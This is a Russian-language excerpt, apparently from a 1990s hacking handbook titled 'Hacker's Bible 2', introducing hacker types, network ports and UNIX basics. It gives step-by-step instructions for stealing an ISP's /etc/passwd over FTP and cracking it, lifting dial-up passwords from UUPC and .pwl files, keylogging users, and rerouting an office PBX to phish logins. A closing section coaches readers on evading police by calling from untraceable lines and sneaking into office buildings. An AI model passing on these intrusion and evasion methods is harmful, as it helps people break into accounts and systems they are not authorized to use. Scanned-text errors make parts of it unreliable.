Максим Левин

 

Библия хакера 2

Книга 1

 

Хакеры, кракеры и фрикеры

 

     Очевидно, что смысл сети сетей состоит в разумности ограничения круга пользователей того или иного сервера. Если подобный сервер закупорен полностью, то и работать может с ним лишь тот, кто его закупорил. Поэтому, любая компания, прежде чем принять решение о вступлении в сообщество Internet, дает себе отчет в том, что существует возможность проникновения в свой главный сервер неких посторонних лиц. Вот эти посторонние лица и называются хакерами.

Когда?

      Хакеры появились в то же самое время, что и Internet. В 1960 годах хакером назывался высококвалифицированный программист. Теперь это слово имеет несколько иное значение. Начало семидесятых и конец восьмидесятых — лучшие годы для хакеров. Тогда было больше ламмеров, операционные системы только начинали появляться, компьютеры на основе таких систем имели много ошибок и дыр. Хакеры в то время были более свободными.

Кто?

      Да, хакеры — это те, кто взламывают сети. Делается это разными способами. Например, через порт терминала или порт электронной почты.

Как?

      Выбрав жертву, хакер прежде всего определяет, имеются ли на сервере плохие пароли, плохо настроенный софт или испорченная операционка. Затем выбирается метод собственной безопасности. Самый распространенный способ проникнуть в сеть так, чтобы остаться незамеченным — это взлом по цепочке:

o        Крякаем Net1.

o        Net1 используем для взлома Net2.

o        Net2 свободна для доступа в Net3.

       И пошло-поехало дальше.

Существуют тонны программ, посредством которых компьютер может вести поиск пароля через перебор некоторого словаря имен. Сложнее вскрыть сеть, если пароль логина имеет больше шести символов, чувствителен к регистру или содержит цифры. Но! В настоящее время многие сети открывают к себе доступ через автоматическое прохождение системы паролей. Эта система построена на так называемом файле паролей. В этом файле перечисляются доступные компьютеры и пароли пользователей сети. Что делает хакер? Он вламывается в сеть и скачивает этот файл. Все!

Другой способ взлома — взлом через так называемые отладочные переключатели операционных систем. Как известно эти переключатели могут иногда находиться во включенном состоянии.

Кроме всех этих вышеперечисленных приблудов, конечно же, широко используется предварительная вирусная атака.         

Взломав сеть, хакер заметает следы и уничтожает всю компрометирующую себя информацию. И через некоторое время сматывается.

Типы хакеров

В настоящее время имеется много типов хакеров, каждый из которых весьма различен:

Хакеры

Народ, вламывающийся в систему ради забавы, не нанося ощутимого вреда компьютерам. Хакеры врываются в систему, оглядываются, и затем пробуют взломать даже более безопасную систему. Они не делают прибыль из хакинга.

Кракеры

Так называемые плохие хакеры. Эти люди нападают на систему и уничтожают ценные данные или крадут программное обеспечение с целью его дальнейшего небесплатного распространения.

Фрикеры

Народ, который занимается хакингом на телефонных линиях с целью получить бесплатный телефонный разговор с любой точкой мира.

Хакер или взломщик?

Многие думают, что смысл существования хакеров состоит в травле несчастных юзеров Internet. Именно к таким типам, наверное и относится Клиффорд Столл, выследивший чудаков из Германии, продававших секретную компьютерную информацию коммунистам. Наверное, он  прав. А вот Роберт Моррис, автор знаменитого червяка-разрушителя, считает, наверное, по другому.

Что же может сделать простой хакер? Хакер или взломщик? А есть ли между ними разница? Есть мнение, что многие вирусники как раз и пишут антивирусы. Значит, есть и хакеры-взломщики или, нет — взломщики-хакеры. Впрочем, все равно информационные убийцы. Как же эти убийцы узнают пароли, вторгаются в Internet и заражают программы на уровне протокола передачи файлов?

Используя особый софт, который вы можете скачать из Internet, вы можете сами стать хакером. Наберите в Yahoo шизофреническое «crack»...

Как стать хакером

Дальше идут шуточки шуточек. Стать хакером очень просто... Достаточно выучить и понять: математические дисциплины (математический анализ, теорию функций комплексного переменного, алгебру, геометрию, теорию вероятностей, математическую статистику, математическую логику и дискретную математику), инженерные дисциплины (физику, аппаратные средства вычислительной техники, основы радиоэлектроники, сети связи и защиту информации от технической разведки), дисциплины по программированию и вычислительной технике (информатику, языки программирования высокого уровня, методы программирования, язык ассемблера, операционные системы, системы управления базами данных и вычислительные сети), специальные дисциплины (криптографию и теоретические основы защиты компьютерных систем).

Это достаточно полный список. Но если же говорить о более подробных хакерских вещах, то вам необходимо знать, что на свете существуют:

·        криптографические методы в системах защиты государственной, конфиденциальной и коммерческой информации.

·        криптографические методы и средства защиты и дешифрования информации.

·        математические методы расчета надежности шифрсистем.

·        математические модели процессов, возникающие при защите информации.

·        методы решения вероятностных, статистических и алгоритмических задач криптографического анализа, синтеза шифрсистем и криптографических протоколов.

·        методы определения угроз безопасности информации.

·        методы построения математических моделей защищаемой информации, шифров и шифрсистем.

·        методы преобразования информации в сетях различного типа.

·        методы прогнозирования оценок криптографической стойкости.

·        обеспечение надежности функционирования аппаратуры шифрования и тестирования программно-аппаратных реализаций криптографических алгоритмов.

·        общая методология криптографического анализа и построения оценок криптографической стойкости шифрсистем.

·        определение каналов утечки информации методикой измерения и расчета параметров опасных сигналов.

·        основные положения теории электрических цепей.

·        основные принципы организации систем и сетей связи и особенности современных сетевых архитектур.

·        основные типы шифров, шифрсистем, криптографических протоколов и способы выбора системы защиты.

·        особенности разработки и сопровождения программного обеспечения для рабочих групп и перепрограммирования.

·        принципы построения шифров, шифрсистем и криптографических протоколов.

·        типовые методы криптографического анализа и оценивания криптографической стойкости.

Начинающему хакеру

Для начала давайте определимся, кто такой хакер.

Хакер — это человек, который досконально знает организацию сети, операционные системы сети, языки программирования.

Так же хакер знает, как построены сетевые протоколы (например, TCP/IP). И еще очень многое.

Почему хакеры будут всегда?

Ответ прост — потому что все сделанное людьми — может ими же быть взломано! А так же потому что всегда будут администраторы с именем «ЛАМЕР ДНЯ».           

Итак начнем...

Для начала вам необходимо найти дистрибутивы следующих сетевых ОС:

·        Linux

·        RedHat -- для начинающего пользователя UNIX

·        SlackWare — для более опытного пользователя UNIX

·        FreeBSD — для людей, которые уже довольно свободно чувствуют себя в UNIX

Постоянная дилемма: что лучше Linux или проект BSD (FreeBSD, OpenBSD, NetBSD...)? Каждый выбирает для себя.

Каждая из них имеет свои преимущества и недостатки.

А теперь ближе к взлому...

Итак, вот список популярных в сети сервисов:

·        ftp 21

·        telnet 23

·        smtp25

·        http 80

·        рорЗ 110

Цифры — это порядковый номер того или иного сервиса.

Итак, все по порядку:

FTP (21)

Наверное, все пользовались FTP, если нет, то все впереди.

Что такое FTP? File Transfer Protocol (протокол передачи файла). Так вот, когда вы подключаетесь через FTP на сервер, то вы автоматически подключаетесь к порту 21 и дальше, используя команды, пользуетесь] этим сервисом.

TELNET (23)

Это тот порт, через который происходит большинство взломов (после обнаружения ошибки), поэтому многие провайдеры и серверы с нормальными администраторами отключают этот порт.

Что можно сделать если вы имеете telnet доступ? Ну, на верное все(!от переформатирования винчестера (на удаленной машине конечно!) да изменения ядра системы.

SMTP (25)

Вы, наверное, не раз в жизни отсылали электронную почту? Так вот, вся электронная почта проходит через этот порт. Simple Mail Transfer Protocol — простой протокол передачи почты.

HTTP (80)

Hyper Text Transfer Protocol — Протокол передачи гипертекста.

Ну, наверное, этот протокол знают все, кто когда-либо пользовался Internet. Все web-серверы, все странички (по большей части) работают через этот порт. Одним словом — все, что вы грузите в ваш браузер доставляется к вам через этот порт.

Так как этот протокол существует давно и при этом претерпел мало изменений, то взлом через него практически невозможен даже для профессионала! Исключая случаи, когда программа на web-сервере с «дырами» в безопасности.

РОРЗ(110)

Через этот порт вы получаете электронные сообщения к себе в Mail-Agent (например, Microsoft Outlook).

Вот вы теперь и разбираетесь (немного) в основных протоколах.

Так как взломать? Не спешите, не все так просто...

Для данного этапа вашего развития как xaкepa вам необходимо знать основы UNIX систем в целом. Так вот — очень (ну очень) краткое описание UNIX. 

Файловая система

В отличие от Windows (далее MUST_DIE), где имена дисков (А, В, С, D...) и путь к файлу выглядит как:

C:\MUST_DIE\die.com

в UNIX существует один основной каталог /, а устройства (такие как CD-ROM) можно найти в директории (например, /cdrom).

В начале эта система вам покажется очень странной — нет буквенных идентификаторов. Но в итоге это в сотни раз удобнее.

Далее.

Все настройки системы находятся в каталоге /etc. Файл с паролями (обычно) находится в каталоге /etc под именем passwd т.е. полный путь к нему — /etc/passwd.

Существует много программ, расшифровывающих этот файл, поэтому я не советую сразу находить их, потому что главное — это списать этот файл, а расшифровать это уже не проблема.

Итак, ломаем провайдера!

Первое, что нужно сделать — узнать реальный IP-адрес,

Делается это очень просто:

tracert (под UNIX traceroute) w3.cnn.com

и вторая строка - это то что нам нужно...

Оттуда (из второй строки) берем IP-адрес (IP — уникальный адрес для каждой машины в сети Internet. Пример 195.55.55.55 (каждое число может быть в диапазоне от 0...255 т.е. 0-255.0-255.0-255.0-255).

Теперь пишем ftp (и после пробела пишем этот IP-адрес). Где писать? В MS-DOS PROMPT или в сеансе MS-DOS.

  Теперь (немного подождав) мы видим строчку login. Здесь пишем ваш логин для входа в систему Internet.

Теперь видим строчку Password. Здесь пишем ваш пароль для входа в Internet.

И мы получаем что-то типа вот этого (честно говоря очень маленькая вероятность того, что ваш провайдер настолько глуп, но с чем черт не шутит! Один популярный сервер w3.dos.net взломали еще проще — подключились к сервису IIS (Internet Information Server), а там вообще не было пароля!

Так вот — продолжаем.

Видим:

Directory /hоmе/usr/ваш_логин not found

Logging in "/"

Вот и все, считайте, что взлом окончен.

Просто напишите строку:

ftp> (писать здесь),get /etc/passwd

Вы получили файл с паролями. «Куда?» — спросите вы. Это легко узнать, запустив команду find под MUST_DIE и искать нужно passwd файл (без расширения). Обычно он записывается в ту директорию, из которой вы запустили ftp программу (т.е. обычно это директория MUST_DIE). Вот и ищите его там, если нет — то смотрите команду find.

Как ни жаль, но таких провайдеров все меньше и меньше. Но они существуют, и, к тому же, появляются новые!

Не огорчайтесь, если у вас ничего не вышло! Это только начало...

Правило номер один: главное — стремление и желание найти «дырки», а так же умение ими воспользоваться.

Хак с самого начала

Как же надо хакать и с чего начать? Для начала попробуй просканировать несколько IP по разным портам. Ты увидишь, что некоторые компьютеры отвечают, а некоторые нет. Некоторые компьютеры ответят и только некоторые, возможно некоторые из найденных будут плохо защищенными и ждать пока ты их взломаешь.

Небольшое отступление: Ты скажешь что это за фигня такая — порты и прочая лабуда? Порт — это адрес определенного сервиса, запущенного на данном компьютере в. Internet. Также их очень часто называют TCP/IP (Transfer Control Protocol/Internet Protocol) порты, так как на них может обратиться другой пользователь из Internet.ElpHMepoM может служить принтер или модем — они ведь тоже обращаются с компьютером через свои порты.

Как только человек выходит в Internet, он сразу же получает свой уникальный IP-адрес (например, ppplO3-3-5.diaIup.glasnet.ru). После этого любой желающий может воспользоваться твоими ресурсами (которые доступны) также, как и тебе ресурсы других. Для того, чтобы воспользоваться услугами, необходимо указать IP:port (к примеру, 195.34.34.30:21 — для того, чтобы попасть на FTP сервер zone.ru).

Теперь ты, возможно, приконнектишься к какому-нибудь серваку к порту 23 (порт telnet) (Пуск выполнить telnet ip:port. Если не указывать порт, то по умолчанию это 23 порт). Если ты нормально приконнектишься, то увидишь приглашение с просьбой ввести логин и пароль. Но поскольку ты не знаешь логина/пароля, то сервер через некоторое время пошлет тебя подальше. Если тебе нечего делать, то можешь попытаться поперебирать пароли, а когда надоест, можешь читать дальше.

Если попробовать приконнектиться к серверу не через 23 порт, а через какие-нибудь другие порты, то при большом везении сервер тебе скажет что ты приконнектился удачно и ты сможешь легко найти нужную комбинацию. Это самый простой способ взламывания серверов. Можно проявить себя как «Белый хакер в шляпе» — посылаешь письмо сисадмину и уходишь с этого сервера (типа незаконной все в таком духе). Ну а если ты никогда не слышал про 273-275 статьи УК РФ, то... ну, я думаю, ты сам догадаешься, что тебе делать...

Небольшое отступление: Сервак — компьютер, подключенный к Internet. Сервис — программа, запущенная на серваке на определенном порту. Каждая такая программа должна отвечать на определенные программы. Если ты дашь этой программе правильную команду, то она должна что-то сделать для тебя. Самый простейший пример — сервис «ЭХО» или по другому — генератор символов (порт 19). Если ты приконнектишься телнетом по этому порту к компьютеру, у которого запущен этот сервис, эта программа будет реагировать на любой нажатый тобой символ и будет показывать его в окне телнета. Все что тебе нужно — приконнектиться к серваку, на котором запущен нужный тебе сервис.

Другой пример — это сервис поиска нужного человека в сети (Finger). Если ты задашь этой программе искать какого либо человека с другого хоста и при этом программа finger запущена на сервере, а также пользователь не сделал так, чтобы его эта программа не находила, то ты получишь об этом пользователе очень много полезной инфы.

Какие сервисы запущены, на каких портах и где об этом узнать? Порты находятся в диапазоне от 1 до 1024 и называются «хорошо известные порты» (well-known). Список использованных портов можно посмотреть в файле на компьютере, который называется «services». В Windows он находится в C:\TBoft_Windows\SERVICES\. В NT это — C:\WINNT\ SYSTEM32\DRIVERS\ETC\SERVICES. Ну а в Юниксе это /etc/services/ (хотя если у тебя стоит Юникс, я думаю тебе это объяснять не надо). Эти порты называются хорошо известными, так как они используются для наиболее распространенных сервисов (WWW, e-mail, FTP, news, telnet). Например, SMTP — отправка почты — 25 порт, РОРЗ — прием почты ПО порт, WWW —80 порт, FTP —21...

Ты можешь быть сбит с толку тем, то что существует куча прог для сканирования всего, чего только возможно и хакеры ими очень часто пользуются. Но! При этом ты можешь нарваться на неприятности, так как у сисадминов есть привычка (далеко не лучшая в твою пользу) просматривать логи всех коннектов и по каким портам, а так же попытки взлома их сервера. Некоторые сисадмины свободно разрешают сканить их серверы, а некоторые, увидев что-нибудь не ладное, сразу откапывают твоего сисадмина и жалуются ему какой ты нехороший (в исключительных случаях это может окончиться тем, что тебя отключит из Internet твой пров навсегда!). В США сканирование разрешено и сами сисадмины часто сканят друг друга в целях нахождения дырок. Но от греха подальше если кого-нибудь собираешься сканить из добрых побуждений — лучше попроси разрешение или хотя бы уведоми об этом сисадмина.

Так что же такое дырки в системах, о которых столько говорят? Дырка — что-нибудь в системе, которое позволяет кому-нибудь контролировать систему в обход сисадмина. Существует очень много типов дырок. Это может быть неправильно сконфигурированная программа, ошибка в самой программе... Наглядным примером плохо сконфигурированной программы может служить старая версия программы sendmail (если сисадмин оставлял команды wiz и debug или дал директории неправильные права доступа на FTP-сервере, то любой желающий мог скачать файл паролей). В таких случаях вся вина лежит на сисадминах, так как ошибка допущена при конфигурировании, а не из-за самой программы.

Другой очень известный и распространенный баг — расшаривание ресурсов в Windows когда это совершенно не нужно или пустой пароль на полный доступ. Из ошибок программ самые распространенные — переполнение буфера обмена у программ, созданных для Internet Очень часто это Используют для того, чтобы перехватить контроль над серваком и потом делать с ним все что твоей душе угодно.

Ну а теперь перейдем к очень известному сейчас виду атак — Эксплоитам. Ты уже наверно не раз слышал об этой атаке, но не понимал, что это такое и как этим пользоваться. Так вот. Эксплоит — это программа, написанная на Си++, использующая дырки в системе для получения прав рута (root) — самого главного человека, которому доступно ВСЕ!!! К примеру это так называемая FTP-Bounce дырка, заключаемая в том, что FTP- сервер (служит для скачки/закачки файлов с сервера/на сервер) настроен так, чтобы переадресовывать запрос пользователя на другой компьютер. По идее эта фича вообще на фиг не нужна (в смысле для сисадминов — нам она как раз таки и нужна). Это только создает возможность взлома, так как эта фича позволяет любому человек просканить порты другого компьютера и представиться компьютеру FTP сервером, с которого идет переадрёсация и этот человек получит «ключи от квартиры где деньги лежат». Вообще эксплоиты наиболее практичные и довольно таки легко применяются (если голова с руками растет откуда надо). С эксплоитом можно хорошо поиздеваться над сисадмином, а также над его системой (ой — а зачем вот эти файлы — они тут ва-а-а-аще не нужны!).

Эксплоит хорош еще тем, что он не ломает систему (сам справишься!), а только дает тебе «ключи». Как ты знаешь, сейчас серваки стоят как минимум на трех типах платформ: NT, VMS и UNIX. У них куча разных версий и типов — UNIX делится на BSD, AIX, SCI, Sun OS, Irix и (наверно) твой любимый Линукс. Ну и конечно же каждая версия глючит по разному и поэтому под разные типы и версии существуют эксплоиты так сказать «нужного калибра», ведь как ты понимаешь эксплоит, сделанный под NT, не будет пахать под UNIX, а сделанный для Sun OS не будет пахать под Линукс (ну, хакеру не проблема переделать эксплоит — на то он и хакер). Ну а разные версии не будут пахать, так как очень часто вообще меняют прогу, которая стоит, только оставляют то же имя и номер версии чуть-чуть переделывают. Конечно же все дырки рано или поздно фиксят и нужно стараться пользоваться новыми эксплоитами. Ну, а теперь самое главное — как же найти эти дырки?

Для начала посмотри, что у тебя из сервисов есть на компе — набери команду netstat -а (в Пуск  Выполнить) и ты увидишь что-то типа этого:

Active Connections                                   

Proto   Local Address               Foreign     Address                       State

TCP      localhost:1027                0.0.0.0:0                         LISTENING

TCP      localhost:135                0.0.0.0:0                      LISTENING

TCP      localhost:135                0.0.0.0:0                       LISTENING

TCP      localhost:1026              0.0.0.0:0                       LISTENING

TCP      localhost:1026              localhost: 1027             ESTABLISHED

TCP      localhost:1027              localhost: 1026             ESTABLISHED

TCP      localhost:137                0.0.0.0:0                        LISTENING

TCP      localhost:138                0.0.0.0:0                         LISTENING

TCP      localhost: nbsession      0.0.0.0:0                        LISTENING

UDP     localhost:135                 *; *

UDP     localhost:nbnarae           *; *

UDP     localhost: nbdatag ram   *; *

     Хммм… вроде ничего интересного. Ну начнем разгребать, что это  такое появилось.

Мы видим, что у Local Address (твой комп) прослушиваются порты 135, 137, 138 и nbsession (в общем это 139 порт прослушивается... можешь написать netstat -an, чтобы увидеть не название портов, а их номера. Насчет этих портов можешь не беспокоиться — это часть Microsoft Networking и они нужны для поддержки LAN (локальной сети). Теперь зайди в Internet и топай, допустим на www.uxx.com, хотя нет, лучше на www.happyhacker.org. Одновременно телнеться на какой-нибудь сервак (ну допустим www.whitehbuse.gov). Теперь снова жми netstat -а и вот что у тебя примерно должно получиться:     

Active   Connections

Proto     Local Address                Foreign Address       State

TCP        localhost:1027                0.0.0.0:0         LISTENING

TCP        localhost:135                0.0.0.0:0                      LISTENING

TCP       localhost:135                 0.0.0.0:0                         LISTENING

TCP       localhost:2508 0.0.0.0:0                      LISTENING

TCP        localhost:2509                0.0.0.0:0                        LISTENING

TCP        localhost:2510                0.0.0.0:0                      LISTENING

TCP       localhost:2511.               0.0.0.0:0                       LISTENING

TCP       localhost:2514             0.0.0.0:0                           LISTENING

TCP        localhost!1026               0.0.0.0:0                        LISTENING

TCP        localhost:1026                localhost:1027              ESTABLISHED

TCP        localhost:1027                localhost:1026              ESTABLISHED

TCP        localhost:137                0.0.0.0:0                          LISTENING

TCP       localhost:138   0.0.0.0:0                          LISTENING

TCP        localhost:139 0.0.0.0:0                          LISTENING

TCP       localhost:2508 zlliks.505.ORG:80       ESTABLISHED

TCP        localhost:2509                zlliks.505.ORG:80       ESTABLISHED

TCP        looalhost:2510               zlliks.505.ORG: 80       ESTABLISHED

TCP        localhost:2511                zlliks.505.ORG: 80       ESTABLISHED

TCP        localhost:2514                whitehouse.gov:telnet   ESTABLISHED

 

Теперь посмотрим, что в этот раз за лабуду выдало. Те же порты, что и по началу, вот только добавилось несколько новых активных портов — 4 коннекта с zllinks.505.ORG по 80 порту и коннект с whitehouse.gov телнетом. Это полная статистика того, что "происходит с твоим компом и Internet.

Так ты узнал настоящее имя сервака www.happyhacker.org (zlliks.505.ORG). По идее у тебя должен возникнуть вопрос — а какого черта есть порты, у которых номера больше 1024??? Так вот, если ты помнишь начало главы, то я там говорил, что эти порты ждут коннекта к ним. Но вот если эта программа коннетиться куда-нибудь, то ей помимо своего порта еще нужен какой-нибудь порт для приема информации, и этот порт берется за пределами этих 1024 портов. Так понятно? К примеру, браузер может открывать до четырех портов — с 2508 по 2511.

Теперь ты возможно захочешь посканить порты друга? Лучший способ сделать это и не бояться быть выкинутым из Internet своим провайдером — попроси друга (подругу) набрать netstat -r. Тогда у него появится что-то типа:              

Network Address

Netmask   

Gateway Address

Interface          

Metric

0.0.0.0

 

 

 0.0.0.0

 

198.59.999.200

198.59.999.200

1

127.0.0.0

 

255.0.0.0

127.0.0.1

127.0.0.1

1

198.59.999..0

255.255.255.0

198.59.999.200

198.59.999.200

1

198.59.999.200

255.255..255.255

127.0.0.1

127.0.0.1

1

198.59.999.255

255.255.255.255

 198.59.999.200

198.59.999.200.

1

224.0.0.0

 

224.0.0.0

 

198.59.999.200

198.59.999.200

1

255.255.255.255

255.255.255.255

198.59.999.200

0.0.0.0

1

Route Table

Active  Connections

Proto    Local Address                           Foreign Address                 State

TCP        lovely-lady:1093                    mack. foo66.com:smtp            ESTABLISHED

Gateway Address и Interface покажут твой реальный IP (ну или IP сервера, если ты сидишь через локальную сеть). Учти, если твой друг сидит в локалке, то прежде 10 раз подумай, чем его сканить, а то сисадминам очень не нравится, когда какой недохакер (как они считают) пытается их поломать и могут пойти на все меры, лишь бы отомстить и поразвлечься (иногда самое безобидное — синий экран).

Вообще-то под таким распространенным термином, как взлом Internet подразумевают сразу несколько разных вещей. Во-первых: незаконное подключение к провайдеру и халявные подключения. Как же можно это осуществить? Самый простой вариант — украсть чужой пароль. В наше время при огромном количестве тупых юзверей сие не представляет никакого труда. Так как подавляющее большинство пользователей пользуется таким популярным пакетом e-mail как UUPC Чернова. А также некоторые туповатые провайдеры все еще предоставляют вход в систему как online так и offline под одним паролем. Остается самое простое — переписать файл и к init или initl с каталога \UUPC. Там будет прописан как login так и password. Пользуйтесь им на здоровье. Но не забывайте про то, что «жадность фраера сгубила».

При более сложном варианте вы запускаете на машину user'а вирус или прогу резидентную, отслеживающую появление строчки login:. Дальше остается грабать клавиатуру и записать полученное в файл.

Если юзверь относительно грамотный и не просто умеет качать почту, а работает более «круто» в Netscape, используя SLIP & РРР, то обратите внимание — при таком качестве связи, как у нашего Совка, связь обрывается частенько. Очень редко можно увидеть, чтобы кто-то из них при соединении набирал логин и пароль вручную. Часто это все делает скрипт командами transmit и им подобными. А все настройки, хитрец, держит под своим паролем в Windows. Как известно, на всякую хитрую жопу... находится очень быстрое решение проблемы: стоит только поискать файлик с расширением .pwl. Там Windows хранит все практически настройки по каждому юзверю. Включая и пароли. Тем паче, что шифрует она все это примитивным вариантом DES. Но алгоритм шифрования в каждом релизе разный. Однако, имея в руках чужой .pwl файл, создав несколько своих с именами 1,2,3,4 и аналогичными паролями, можно проследить интересную зависимость, которая и выведет вас к желаемому результату.

Если на машину юзера доступа нет, то к решению проблемы можно подойти и другим путем. Справедливости ради надо заметить, что практически лавинная доля соединений приходится на телефонные линии. Дальше — лучше. Наверняка у вас в офисе есть мини-АТС. Перепрограммировать ее, чтобы звонки с данного номера перероучивались на ваш — плевое дело. Осталось только запустить терминальную программу BBS, в заставке указать заставку вашего провайдера. И юзер ведь купится! На 100%; Введет и login, и password. Проверено уже, и не раз. Теперь осталось выдать ему кучу ошибок, а затем дропнуть линию. После двух-трех попыток (вдруг он неверный пароль введет) верните АТС в нормальное состояние. А то прецеденты с последующей раздачей слонов и пряников уже  бывали.

Если удалось раздобыть login/passwd, то имея пароль с минимальными пользовательскими привилегиями хочется получить их гораздо больше. С минимальными привилегиями получить статуе root — задача не одного дня. Но начинать с чего-то надо. А начнем мы с того, что узнаем, с какой системой имеем дело. В настоящее время провайдеры висят на самых популярных UNIX: FreeBSD, BSDI, SCO open server, Linux. Некоторые, правда, используют такую экзотику как NexStep, UnixWare, Solaris, Aix, HP-UX, VAX-ORX5.12. Встречаются уникумы, работающие с Xenix. Но несмотря на видимое обилие операционных систем, все они имеют практически одинаковую систему защиты и идентификации пользователей и их ресурсов, которые передавались по наследству от AT&T UNIX с 1971 года. Стандартные средства защиты UNIX:

·        защита через пароли;

·        защита файлов;           .

·        команды su, newgrp, at, prwarn, sadc, pt_ehmod;

·        шифрование данных.

Любой пользователь UNIX имеет свой пароль, без которого он не может включиться в систему, писать/читать почту. Практически во всех UNIX пароли находятся в /etc/passwd. Этот файл содержит информацию о пользователе, его пароле и уровне привилегий.

Дописать в этот файл информацию о своем login/passwd и уровне привилегий может только root. Ты можешь его только читать.

Но что же мешает переписать/прочитать его и пользоваться чужими login'aми? Прочитать можно. И с огорчением увидеть что не все так в жизни просто. Да, там хранится login пользователя. Но сам пароль хранится только в зашифрованном виде. И вместо пароля в лучшем случае увидишь абракадабру типа #@4OFIU'0346>e.

Расшифровкой этого занимаются программы типа jack, crackerjack, blob и множество подобных. Успех напрямую зависит от данной операционной системы. Чтобы успешно расшифровать passwd, необходимо, как минимум, иметь две пары логинов, паролей расшифрованных и зашифрованных. Напустив на passwd от Linux 2.1.3 крякалку паролей blob и имея пять пар известных паролей, в опытном варианте за 20 минут успешно расшифровываются все пароли. Но проблема в том, что алгоритмы шифрования очень улучшаются с каждой новой версией системы, а в таких коммерческих UNIX как SCO Open Server 5 имеется очень навороченные системы криптования. К примеру, если SCO 3 с уровнем защиты от 1,2,3 сломалась в течение 3 часов перебора, то 4,5 где-то за четверо суток, 6 так и не удалось поломать.

Как не попасть в лапы закона

Козлевичу не везло. Его ловили и тогда, Когда он применял излюбленные им технические средства, и тогда, когда он обходился без них. Его ловили на вокзалах, пристанях, на пароходах и в гостиницах. В вагонах его тоже ловили. Его ловили даже тогда, когда он в полном отчаянии начинал хватать чужую собственность по предварительному сговору с другим лицами.

И. Ильф, Е. Петров. Золотой теленок.

 

Хакерство — это здорово. Черт возьми, да это просто потрясающе! Но вместе с тем хакерство — нелегальное, порой аморальное и обычно наказуемое занятие. Даже если вы не сделали ничего плохого, для судей вам придется подыскать достаточно веское обоснование своим действиям. Самое малое, что может произойти, это заделка прорех в компьютерной безопасности, которые вы использовали для взлома. Более серьезные наказания могут варьироваться от штрафов и вплоть до тюрьмы. Неофициальные наказания могут заключаться в разрушении вашего оборудования и невозможности устроиться на работу, имеющую отношение к технике. Занимаясь своим делом, предусмотрительный хакер преследует две цели:

1.        Не попасться.

2.        В случае, если попался, постараться не усугублять дела.

В этой книге рассказывается о стратегиях, с помощью которых можно следовать определенным правилам. Хакинг предполагает не только технические знания, но и особый склад ума этого самого хакера. И часть этого ума должна быть отдана знаниям о том, как обеспечить собственную безопасность, иначе оставшаяся часть будет тратиться зря. Приведенные здесь стратегии следует не только знать и применять, но и уметь приспосабливать их к новым ситуациям. Не забывайте, сколько компьютерных преступников отправились в тюрьму. Правда, некоторые из них умудрялись заниматься хакерством и там. Некоторые даже научились хакерству в тюрьме. Но если вы все же не стремитесь туда попасть, везде и повсюду помните приведенные ниже советы.

В процессе исследований

На вашей территории проживания могут действовать местные законы, запрещающие машинам или людям постоянно набирать номера и отключаться сразу после набора (так поступает, например, программа автонабора, когда ищет входные наборы). В случае, если вы делаете звонки самостоятельно, лучше говорить тому, кто поднимет трубку: «Извините, я ошибся номером», нежели просто бросать трубку. Помните правило: чем больше людей вы разозлите, тем больше вероятность, что вас начнут преследовать и, в конце концов, накажут.

При занятиях социальной инженерией

Социальная инженерия, а еще чаще обратная социальная инженерия, предполагает контакт с зарегистрированным пользователем по телефону или посредством электронной почты. Это рискованно, так как при этом вы даете свой адрес или телефонный номер людям, которых собираетесь обмануть. Для решения данной проблемы хакеры разработали несколько оригинальных методов.

Однажды я вышел на небольшое предприятие, которое закрывалось на несколько недель. Проведя некоторые исследования и свершив несколько взломов, мне удалось найти программу, которая оставляла сообщения на их автоответчике. С ее помощью я смог входить в контакт с людьми, не сообщая им, кто я такой. Я поместил телефонную рекламу компьютерной сети, приглашавшую людей звонить и оставлять свои имена и данные. Я мог в любое время вызвать компьютер, набрать заветный код и прослушать эти сообщения. Когда предприятие вновь открылось, я позвонил им, сказав, что я из телефонной компании, и сообщил владельцу, что несколько линий пересеклись, из-за чего к ним иногда могут проходить непонятные звонки.

Некоторые хакеры просто переводят телефонные автоматы в резидентное состояние и работают с них. Для занятий социальной инженерией по почте можно арендовать личный почтовый ящик. Один хакер нашел более простое решение. Он заметил, что почтовый ящик в колледже, находящийся прямо под его ящиком, всегда пустует и, по-видимому, никому не принадлежит. Он долгое время пользовался им, с помощью нехитрого приспособления опуская туда свою секретную корреспонденцию (позднее я показал ему, как открывать эти ящики).

Использование телефона

В случае, если хотите сохранить что-то в секрете, не говорите об этом по телефону

Нельсон Рокфеллер

 

В случае, если вы новичок, у вас может не возникнуть никаких затруднений с вызовом удаленных компьютеров из собственного дома. Но однажды вы можете оказаться в ситуации, когда не будете точно знать, не прослушивают ли ваш телефон и не следят ли за тем, как вы используете компьютер. Значит, если вы уже вышли из хакерского «детства», вам не следует делать незаконных вызовов из своего дома и вообще с любого телефона, по которому вас могут выследить.

Неприятности могут произойти, даже если вы действительно новичок. Представьте себе, что вы стали членом TECHRIME-USA BBS как раз тогда, когда ФБР собирается начать акцию против системных операторов, использующих свои доски объявлений в нелегальных целях! Вам совсем не захочется быть втянутым в это, особенно, если вы не делали ничего противозаконного. Даже намек на полуправдивые слухи, циркулирующие по каналам технического андеграунда, может заставить телефонные компании начать следить за проходящими по их линиям модемными сообщениями и записывать их. Это может проделываться автоматически с помощью детекторов, которые прослушивают тоны модемов и передают их на записывающее устройство. В любом случае надо учитывать следующее:

1.        Технология, позволяющая делать такие вещи, существует, и

2.        Известно, что прослушиваются очень многие телефоны. Итак, если вам необходимо общаться с известными компьютерными преступниками, или с доказанными хакерами, соблюдайте крайнюю осторожность.

Делать телефонные вызовы можно не из дома, но откуда-либо еще. Возможно, придется раскошелиться на портативный лаптоп. Сделав это, купите к нему также акустический соединитель и внешний модем. Все это обойдется вам в одну-две тысячи долларов — гораздо меньше, чем потребует с вас адвокат, если вы попадетесь. Акустический соединитель необходим, так как не везде имеются телефонные розетки. Во внешний модем вы будете вставлять соединитель. Многие лаптопы уже снабжены модемами, но это внутренние модемы, которые нельзя подсоединить к телефону.

Итак, вы обзавелись оборудованием. Куда бы его поместить? Существует много возможностей. Ночью и на уик-энд иногда возможно проникнуть в здание какого-нибудь большого офиса и, если дверь не заперта, устроиться в одной из смежных комнат. Два года назад летом, прогуливаясь в центре своего города около девяти вечера, я заметил, что окна всех учреждений открыты — и это вечером! Днем стояла жара, и, вероятно, их таким образом проветривали. Будь я в соответствующем настроении, я мог бы беспрепятственно проникнуть в любое здание и подключить свой портативный компьютер к телефону, находясь всего в нескольких сотнях метров от полицейского участка.

